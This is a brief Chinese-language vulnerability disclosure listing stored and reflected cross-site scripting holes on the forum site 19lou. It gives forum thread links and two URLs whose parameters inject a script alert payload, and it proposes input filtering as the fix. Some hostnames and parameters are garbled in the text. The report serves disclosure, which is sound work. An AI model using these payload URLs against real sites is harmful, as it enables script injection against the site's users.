发帖处过滤不严,导致xss 漏洞 ! 持久型: http://HdhCmsTest19lou测试数据/forum-3206-thread-15301334835859518-1-1. html http://HdhCmsTest19lou测试数据/forum-291-thread-18701334837491991-1-1.html 反射型 http://topic.19lou测试数据/club/2010/lottery/jsonbaby.php?callback=?test<script>alert(/goderci/)</script> http://HdhCmsTest19lou测试数据/haodian/list/business?categoryId=1®ionId=0&address="/><script>alert(/goderci/)</script> 漏洞证明:http://HdhCmsTest19lou测试数据/forum-3206-thread-15301334835859518-1-1.html http://HdhCmsTest19lou测试数据/forum-291-thread-18701334837491991-1-1.html 修复方案: 过滤! 作者goderci
查看更多关于十九楼持久型及反射型xss各两处 - 网站安全 - 自的详细内容...